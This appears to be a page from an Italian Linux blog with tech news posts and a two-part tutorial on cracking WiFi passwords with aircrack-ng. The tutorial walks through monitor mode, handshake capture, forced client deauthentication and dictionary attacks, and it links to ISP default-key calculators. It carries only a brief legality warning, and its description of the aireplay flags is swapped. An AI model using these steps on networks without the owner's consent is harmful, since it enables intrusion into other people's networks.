Crea sito

gen 22

Firefox OS: nuovo sistema operativo targato mozzilla

Firefox OS è uno dei nuovi sistemi operativi mobili attesi per il 2013, il progetto open souce si basa su kernel Linux con un’interfaccia grafica basata sul nuovo Html5.
Il progetto Firefox OS ha già portato accordi con alcune aziende per rilasciare prossimamente nuovi dispositivi con preinstallato il nuovo sistema operativo mobile di Mozilla.
Mozilla inoltre ha annunciato con un post sul proprio blog il rilascio di Firefox OS Phone un nuovo smartphone dedicato agli sviluppatori del progetto.

i terminali che supportano questo os saranno aggiornati via OTA; saranno equipaggiato con un display touchscreen da 3,5 pollici HVGA e fotocamera posteriore da 3 megapixel, una CPU Snapdragon S1 da 1GHz, mezzo giga di RAM, 4 GB di memoria interna, espandibile tramite microSD e connettività WiFi, oltre che cellulare.

Infine, una buona batteria 1580mAh che dovrebbe consentire un discreto utilizzo. Al momento, non si conoscono dettagli per quanto riguarda il prezzo; tuttavia i primi esemplari dovrebbero essere disponibili a partire dal mese prossimo.

ecco un video dimostrativo:

gen 20

Mega: il nuovo megaupload

Megaupload ritorna, adesso si chiama Mega, è il nuovo servizio realizzato da kim Dotcom: l fondatore di megaupload.
Il nuovo Mega è un servizio “cloud” che offre 50 Gb di spazio web gratuito per ogni account nei quali potremo caricare i nostri file quali documenti, immagini, video, musica ecc con la possibilità di condividerli con i nostri amici.
Attualmente Mega è accessibile solo dal web ma presto sarà disponibile il client ufficiale per Windows, Mac e Linux e l’applicazione mobile per Android e Apple iOS.
I dati caricati sui server Mega avranno chiavi d’accesso codificate in RSA a 2048-bit i file possono essere condivisi tramite link il tutto dopo aver letto per bene il copyright.
Semplicità è la parola d’ordine del nuovo MEGA sia la gestione dell’account, l’upload e download dei file è molto semplice e funzionale. Ma nei prossimi mesi Mega aggiungerà molte novità dalla chat alla possibilità di effettuare chiamate e video chiamate e molto probabilmente l’arrivo di servizi streaming come il buon vecchio Megavideo.
Dalla Nuova Zelanda, Kim “Dotcom” ha annunciato l’apertura dell’indirizzo mega.co.nz alle 6:48 ora locale (le 18:48 di ieri in Italia), esattamente un anno dopo la perquisizione da parte della polizia della sua proprietà di Auckland .
«Centomila utilizzatori in meno di due ore, 250.000 iscritti, server al massimo della loro capacità, wow!!», ha commentato euforico Dotcom sul suo account Twitter.
lo potrete trovare all’indirizzo:
http://www.mega.co.nz
forse non riuscirete accedere al sito a causa dei molti utenti connessi :D, basta che aggiorniate la pagina e riuscirete ad accedervi
fonti: lffl, la stampa.it

gen 17

Android x86: android sbarca anche su pc

apriamo la prima serie di post di android con questa notizia: android è arrivato anche sul pc. dopo avere invaso tutti i nuovi smartphone dove altro poteva arrivare??? Android x86 è un progetto che permette di installare android su un normale pc tramite livecd o installandolo sul computer con tanto di bootloader.

gli sviluppatori di androidx86 hanno sviluppato questa nuova iso basata su jellybean 4.1.2 (la penultima uscita!!)
con una nuova interfaccia grafica (stile nexus 7)
Ricordiamo pero che Android 4.2. JB su Android X86 è un progetto ancora in fase di sviluppo ma già abbastanza stabile er questo consigliamo di installarlo su macchina vistruale ( vistrualbox) presente anche nei repository di ubuntu.

possiamo installare questo Os sul pc scaricando file immagine ISO da questo link , e installarlo su usb (in modo da avviarlo in mod live) se utilizziamo Linux con dd da terminale oppure image-writer se utilizziamo Windows.

gen 15

craccare reti wireless con ubuntu (seconda parte)

se avete seguito la prima parte della guida avrete gia installato aircrack-ng sulla vostra distribuzione.

date da terminale:

iwconfig

aircrack-geekubuntu

prendetevi nota della vostra periferica wifi ( da me wlan 0)

sudo airmon-ng start wlan0

iw config

dovrebbe apparirvi adesso mon0 ( o accanto alla vostra periferica wifi ( la mia wlan0 dovrebbe esserci scritto monitor mode enable) voi usate mon0)

sudo airodump-ng mon0

prendetevi nota del bssid (l’indirizzo della rete da craccare dovrebbe essere tipo 00:E87:99:87:O8)

dell essid ( il nome della rete ( nel mio caso casa )

il canale ( sotto ch) da me il 12

date da terminale

sudo airodump-ng mon0 -c 12 –bssid 00:E87:99:87:O8

dove:

  • mon0 è il nome della periferica wifi
  • -c il canale dell’access point
  • –bssid l’indirizzo dell’access point

iniziera a catturare tutti i pacchetti… se la rete è la vostra come spero.. :D basta collegarsi con un altro client ( pc telefono, ….) e catturera subito l’handshake (stretta di mano) è necessaria per trovare la password XD.

se trovate un client collegato alla rete potete dare

sudo aireplay-ng -0100 -a 00:14:BF:6F:54:64 -c 78:92:9C:83:99:48 mon0

dove:

  • -0100 le volte che blocca la connessione facendo scollegare il client
  • -a il client
  • -c l’access point

appena catturate l’handshake potete scaricare un dizionario piu grande basta che cercate su google dizionario aircrack o usate quello di cui gia dispone la suite

date quindi:

sudo aircrack-ng –w [file_dizionario] *.cap

dove:

  • ildizionario è quello che avete scaricato e copaito nella home (estenzione lst)
  • il file cap è quello creato con airodump ed è sempre nella home

trovata la passowrd basta connettervi XD

gen 15

craccare reti wireless con ubuntu ( prima parte)

da qualche giorno sto prvando a testare la mia rete wireless.

ho provato alcune suite di crack e la migliore secondo me è stata aircrack-ng.

vi ricordo che entrare in rete wifi altrui non è legale senza il  consenso del proprietario.

premessa:

questo metodo funziona sicuramente su reti wep ma anche sulle wpa ( qui pero serve un client,( un pc collegato)

che non siano della fastweb, alice, vodafone o tutte le compagnie che forniscono un servizio adsl ( ci si inpegherebbe troppo tempo per trovare le passowrd)

per craccare le reti sopra citate potete usare applicazioni per smartphone ( android ed iphone) lo store è pieno…o servizi online come:

http://www.capn3m0.org/fastweb-wpa-calculator-online

http://www.capn3m0.org/alice-wpa-calculator-online

riassumiamo:

  • con questa suite potete craccare tutte le reti
  • per quelle che finiscono con una combinazione di numeri tipo alice-111111111 usate i tool sopra indicati (fate prima)

per usare aircrack-ng aprite il terminale e date :

  • se avete ubuntu 11.10 e precedenti o ubuntu 12.10

sudo apt-get install aircrack-ng

  • se avete ubuntu 12.04 date:

sudo apt-get install libssl-dev build-essential libsqlite3-dev unrar

wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz

tar -xvf aircrack-ng-1.1.tar.gz

cd aircrack-ng-1.1

modificate il file common.mak dando :

sudo gedit common.mak

modificate la riga 70 ( -g -W -Wall -Werror -O3)in :

-g -W -Wall -O3

salvate e uscite.

date sempre da terminale:

sudo make

sudo make install

avrete installato aircrack-ng sulla vostra distribuzione. per continuare passate alla parte 2 della guida.

gen 11

geekubuntu arriva su facebook!!

geekubuntu è arrivato anche su facebook!!!

vi lascio il link:

http://www.facebook.com/pages/Geekubuntu-tutto-su-linux/546764235335674?ref=hl

speriamo che grazie al vostro aiuto ottenga molti mi piace e raggiuga altri social network

in piu ci sono anche i pulsanti di condivisione per google + twitter faceboook e altri!!!

gen 10

arch linux arriva anche su wii!!!

Arch_Wii_by_Ghost1227La comunità Arch Linux per fare conoscere meglio la propria distribuzione si è impegntata ad avviare nuovi progetti… uno di questi ??? portare questo distro linux sulla wi (la conosole di casa della nintendo!!)
altri sono :
Tra i vari progetti realizzati dalla comunità Arch Linux troviamo Arch Linux ARM che punta a portare la distribuzione in dispositivi mobili anche ubuntu leggi il post precedente!!) come tablet o pc con processori con architettura ARM, l’ambiente desktop Mate ecc.
eravamo rimasti al nuovo progetto per la wii.. il suo nome è archmii!!
Archii è un progetto che offre l’installazione del sistema base di Arch Linux su Nintendo Wiioffrendo il kernel dedicato in grado di offrire il completo supporto per l’hardware della console.
Una volta installato il sistema base e connessi ad internet via Wireless oppure utilizzando una pendrive collegata alla porta usb della console potremo installare l’ ambiente desktop e le applicazioni preferite.
con una wii a casa lo provosubito e poi vi dico !!! vi lascio il video di youtube dello staff e i link al progetto :)

fonte: lffl.org

gen 06

ubuntu phone OS: forse nel 2013 :)

ubuntu_mobile_1sulla pagina ufficiale di ubuntu ( ubuntu.com) alcuni giorni fa è apparso il countdown a una nuova notizia che è stata svelata nei primi giorni del nuovo anno !!!

il team di ubuntu sta preparando un nuovo os.

per capire meglio ecco la recensione da lffl:

Ubuntu Phone OS è un nuovo sistema operativo basato su Kernel Linux e supporto per processori ARM e X86.
Canonical non ha specificato se il progetto rimarrà proprietario (come Ubuntu for Android)oppure sarà open source.
Ubuntu Phone OS supporterà le applicazioni web e applicazioni native le quali potranno “girare” anche sulla versione desktop di Ubuntu, anche se basato su kernel Android non saranno supportate le applicazioni e giochi native per Android.
Gli sviluppatori avranno a disposizione una nuova piattaforma di sviluppo SDK basata su QML dedicata per le applicazioni per il nuovo Ubuntu Phone OS .

Vi lascio la descrizione dei nuovi smartphone targati canonical:

Eleganza, distillata

Progettato per rendere tutto il contenuto del telefono più semplice per accedere e le tue applicazioni più coinvolgente – ogni spigolo ha uno scopo specifico, rendendo tutte le applicazioni, i contenuti e controlla immediatamente accessibili, senza navigare per tornare alla schermata iniziale ogni volta.E il telefono di Ubuntu si inserisce perfettamente nella più ampia famiglia di interfacce di Ubuntu, a fianco del PC e TV. E ‘un’esperienza unica, ben convergenti.

da qunato si è capito questo nuovo os sara disponibile dal 2013…..

registratevi alla newslettere per saperne di piu o continuate a seguire geekubuntu

vi lascio il link alla pagina ( è in inglese !!! meglio usare google traduttore)
ubuntu for phone

dic 27

auguri di buon natale (in ritardo) :)

 

auguri di buon natale da tutto il team di geekubuntu !!!

un po in ritardo ma… -_-

Christmas_Ubuntu_wallpaper2

dic 27

estrarre da archivi rar su ubuntu

vi sarete trovati di sicuro un pacchetto .rar su ubuntu.. come fare con il gestore archivi che non supporta questo formato??

e qui arriva un ottima applicazione che si unisce insieme al gestore archivi per decomprire questi file.

aprite il terminale e date questi comandi:

sudo apt-get update

sudo apt-get install unrar

fino da subito potrete utilizzare il gestore di archivi !!! per estrarre potete fare in due modi:

1 tasto destro / estrai qui

2 da terminale

cd …… ( il percorso del file rar)

unrar (nome file rar)

 

Post precedenti «

» Post successivi